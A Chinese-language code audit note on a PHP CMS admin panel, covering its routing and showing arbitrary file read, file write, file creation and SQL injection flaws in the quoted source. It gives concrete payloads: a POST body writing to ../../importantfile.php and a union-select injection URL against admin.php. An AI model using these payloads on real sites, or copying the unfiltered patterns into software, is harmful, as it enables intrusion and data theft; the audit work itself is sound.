路由规则

分为前台和后台，

前台在api.php中

<?php  
session_start();  
include('config.php');  
include(SYS_ROOT.INC.'common.php');  
$ctrl=$_REQUEST['ctrl'];  
$action=$_REQUEST['action'];  
$m=ucfirst($action);  
if(!in_array($m,array('Api','Comment')))die;  
$model=new $m();  
if (method_exists($m,$ctrl)) {  
$model->$ctrl();  
}

主要是判断m类参数是否有指定方法以及参数是否正确。

<?php  
session_start();  
include "../config.php";  
include "../include/common.php";  
$action=$_REQUEST['action'];  
$ctrl=$_REQUEST['ctrl'];  
$id=(array)$_REQUEST['id'];  
//请登录  
if(!Base::checkadmin()&&$ctrl!='login'&&$ctrl!='checkUser'){  
Base::showmessage('',"index.php?action=login",1);  
}  
$referInfo=parse_url($_SERVER['HTTP_REFERER']);  
$referHost=isset($referInfo['port'])?"{$referInfo['host']}:{$referInfo['port']}":$referInfo['host'];  
if($referHost !== $_SERVER['HTTP_HOST']&&$ctrl!='login'){  
Base::showmessage('refer error','admin.php?action=frame&ctrl=logout');  
}  
if(Base::catauth($action)){  
if(class_exists($action)){  
$model=new $action($action,$id);  
if (method_exists($action,$ctrl)) {  
$model->$ctrl();  
}  
}  
}  
?>

好像规则差不多，就是加了一个session验证，然后写法不太一样其他就差不多了。

任意文件读取

在file.php中的download函数中，

function download(){  
$info=pathinfo($this->path);  
header('Content-Disposition: attachment; filename="'.$info['basename'].'"');  
echo file_get_contents($this->realpath);  
}

可以看到这个函数没有对获取文件进行任何过滤。

并且在managefile中有对参数的输入
![[Pasted image 20250226225556.png]]
所以可以利用。

任意文件写入

一、直接使用save

同样位于File文件中

function save(){  
$path=$this->path;  
if(!is_writable($this->realpath))Base::showmessage('无保存权限');  
$filedata=get_magic_quotes_gpc()?Base::magic2word($_POST['filedata']):$_POST['filedata'];  
$status=file_put_contents($this->realpath,$filedata);  
if($status){  
Base::showmessage('保存成功','admin.php?action=file&ctrl=lists');  
}  
}

可以看到save函数并没有对文件内容及文件名称进行任何过滤，所以可以进行php文件写入及替换

name=data%2Finstall.lock&filedata=arbitrary+file+writing+test&action=file&ctrl=save&path=../../importantfile.php&Submit=%E4%BF%9D%E5%AD%98

任意文件上传

使用创建文件的create方法，可以进行创建文件，并且没有过滤

function create(){  
if(!$_GET['name']){  
Base::showmessage('请填写文件名/文件夹名');  
}  
$file=$this->realpath.'/'.$_GET['name'];  
if($_GET['isdir']==1){  
mkdir($file);  
$str='目录';  
}else{  
fopen($file,'a');  
$str='文件';  
}  
if(!is_writable($file))Base::showmessage('新建'.$str.'失败');  
$info=pathinfo($this->path.$_GET['name']);  
Base::showmessage('新建'.$str.'成功','admin.php?action=file&ctrl=lists&path='.$info['dirname']);  
}

可以通过
![[Pasted image 20250227195758.png]]

进行调用，create函数，进行文件上传

sql注入

function create(){  
header('Content-type: application/txt');  
header('Content-Disposition: attachment; filename="backup-'.date('Y-m-d').'.sql"');  
$backups='';  
$bulist=explode('|',$_GET['bulist']);  
foreach($bulist as $bus){  
$addsql=($bus=='cms'&&$_GET['from'])?' limit '.$_GET['from'].','.$_GET['to']:'';  
$sql='select *from '.TB.$bus.$addsql;  
$o=$this->db->query($sql);  
while($data=$this->db->fetch_array($o)){  
$colums='';  
$datas='';  
foreach($data as $key=>$v){  
$colums.=$key.',';  
$datas.="'".Base::safeword($v)."',";  
}  
$backups.= 'REPLACE INTO '.TB.$bus.' ('.substr($colums,0,-1).') VALUES('.substr($datas,0,-1).');'."\n";  
}  
}  
echo substr($backups,0,-2);  
}

可以看到这个create中bulist是可以自己上传的，并且直接进行了拼接。

/admin/admin.php?action=datastore&ctrl=create&bulist=admin+where+id=1+union+select+(user()),2,3,4,5,6,7,8